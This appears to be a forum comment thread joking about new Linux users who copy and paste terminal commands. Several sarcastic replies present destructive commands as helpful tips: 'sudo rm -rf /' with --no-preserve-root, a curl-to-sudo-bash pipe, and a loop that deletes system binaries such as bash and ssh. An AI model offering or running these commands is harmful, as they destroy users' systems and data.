top 50 comments

sorted by: hot top controversial new old
[–] 70 points 3 years ago (3 children)

Nothing better than curl https://totally-legit-installer.com/script | sudo bash

  • source
  • hideshow 3 child comments
  • load more comments (1 reply)
    [–] 61 points 3 years ago* (15 children)

    I'm in a helpful mood so I'll add something for anyone stuck in OP's situation.

    It's ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

    Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

    sudo rm -rf /

    Type your password when prompted and you're golden. No more linux issues ever again.

  • source
  • hideshow 15 child comments
  • [–] 30 points 3 years ago* (last edited 3 years ago) (1 child)

    Remember that if you run it as root and dont add the flag --no-preserve-root you leave your system vunrable to hackers like Anonymous or 4chan until you reboot,

    I also find that adding --verbose adds more things like commentary and extras that really help

    So, run sudo rm -rf --no-preserve-root --verbose

    /s

  • source
  • parent
  • hideshow 1 child comment
  • [–] 19 points 3 years ago*

    All good points.

    That's why I love communities like these, there are always people willing to expound upon other's solutions with solid additional information.

    It's what makes forums like these such goldmines of information when you're first cutting your teeth learning new things.

    Upvoted.

  • source
  • parent
  • [–] 21 points 3 years ago* (5 children)

    I tried your command and got the tutorial program and I gotta say that this is the best tutorial program I've ever seen. Now I wonder why other OSes don't do that

  • source
  • parent
  • hideshow 5 child comments
  • [–] 13 points 3 years ago* (last edited 3 years ago) (4 children)

    It's great, isn't it? As a side bonus, the tutorial modules on system optimization commands are just great. Check how much less RAM and CPU footprint your system's using now that you've run the tutorials. It's almost like nothing's going on in the background at all.

    This is the reason that BASH will always be better than Powershell, imho.

  • source
  • parent
  • hideshow 4 child comments
  • [–] 4 points 3 years ago (3 children)

    It optomizes your computer too? Woa

  • source
  • parent
  • hideshow 3 child comments
  • [–] 12 points 3 years ago (2 children)

    Well, technically it teaches you how to optimize your system.

    That said, the optimizations are really effective.

  • source
  • parent
  • hideshow 2 child comments
  • [–] 8 points 3 years ago* (last edited 3 years ago) (1 child)

    Note that the more corporate distros install PUPs (Potentially Unwanted Programs). (like clang) To uninstall, do what youd do on a Windows machine and wrip it out of your PC forcably

    while read bloatware; do bloatware="$(echo "$bloatware" | cut -f1 -d'#')"; file="$(whereis "$bloatware" | cut -f2 -d' ')"; if test -f "$file"; do unlink "$file"; fi; done <<bloatlist 
    clang # unwanted telemitry
    bash  # promotes violence
    tree    # hippy garbage
    awk    # secret backdoor into your PC
    ssh    # isnt up to date on its intentional encryption backdoor certificate
    bloatlist
    

    /sHope nobody dumb enough to run this Because it actually works

  • source
  • parent
  • hideshow 1 child comment
  • [–] 4 points 3 years ago

    Lol, I know what you mean.

    Isn't it fucked up how we all say that linux doesn't have viruses, and yet how many times have you ever seen an install of Mint or Ubuntu that didn't have "Tree" or "Awk" just sitting there waiting to ruin your whole day.

    I swear to God Canonical have some things to answer for.

  • source
  • parent
  • [–] 40 points 3 years ago (11 children)

    That’s probably how most of us started, but then you start getting familiar with things…

  • source
  • hideshow 11 child comments
  • [–] 46 points 3 years ago (8 children)

    And that's when you really get good at breaking shit.

  • source
  • parent
  • hideshow 8 child comments
  • [–] 29 points 3 years ago (6 children)

    In my early days I would reinstall the whole OS several times a week when I would fuck things up too much.

  • source
  • parent
  • hideshow 6 child comments
  • [–] 13 points 3 years ago (4 children)

    Ah, the good old days of installing some obscure distro just to reinstall from scratch a week after πŸ‘ŒπŸΌ

  • source
  • parent
  • hideshow 4 child comments
  • load more comments (1 reply)
  • load more comments (1 reply)
  • [–] 32 points 3 years ago (8 children)

    I actually take the time to type everything out, but I still have no idea what I’m doing.

  • source
  • hideshow 8 child comments
  • [–] 8 points 3 years ago (6 children)

    You know, my students do this. It's freaking hilarious when they inevitably have a typo and get an error. I chuckle every time. πŸ˜„

  • source
  • parent
  • hideshow 6 child comments
  • load more comments (1 reply)
    [–] 22 points 3 years ago (2 children)

    People underestimate how important being able to google answers on the internet has been for the take-up of linux and many other things. Most of us would be lost without Google.

  • source
  • hideshow 2 child comments
  • [–] 18 points 3 years ago (1 child)

    Not just Linux, I do this all the time when 'writing' R or Python scripts for work. Then I spend the next 2 hours debugging a missing comma.

  • source
  • hideshow 1 child comment
  • load more comments (1 reply)
    [–] 17 points 3 years ago (7 children)

    For anyone who needs it. Try out:

    curl cheat.sh/
    
  • source
  • hideshow 7 child comments
  • [–] 12 points 3 years ago

    You move past this stage once you start actually depending on the system. Then you find imperfect answers to some problem and have to adapt them to your system. Then you start learning.

  • source
  • [–] 11 points 3 years ago (3 children)

    Years ago I started out like this, then gradually started reading and understanding the stuff.

  • source
  • hideshow 3 child comments
  • load more comments (3 replies)
    [–] 10 points 3 years ago (7 children)

    I don't think that's a terrible way of getting started. Your subconscious will do the rest at some point, unless you're really not interested at all (which isn't a problem either). :)

  • source
  • hideshow 7 child comments
  • [–] 10 points 3 years ago (1 child)
    load more comments (1 reply)
    [–] 9 points 3 years ago (3 children)
    load more comments (3 replies)
    [–] 8 points 3 years ago

    I think this is how most people start but you gotta start somewhere right? This site helped me a lot: https://explainshell.com

  • source
  • [–] 6 points 3 years ago

    copy and pasted random login info

    "Why isn't this working?"

  • source
  • [–] 5 points 3 years ago (1 child)

    All hail the arch Linux wiki!

  • source
  • hideshow 1 child comment
  • load more comments (1 reply)
    [–] 5 points 3 years ago

    ChatGPT has actually been invaluable for switching to Linux for this reason. I only broke my system after I tried finding my own solutions to problems online and copied that code.

  • source
  • [–] 5 points 3 years ago

    There is a big issue in the Linux community where people are very concerned with the OS itself and not what people are actually doing with it. So if copy pasting is working and you are getting whatever it is you want don’ done, done, then no one should care how you got there.

  • source
  • load more comments
    view more: next β€Ί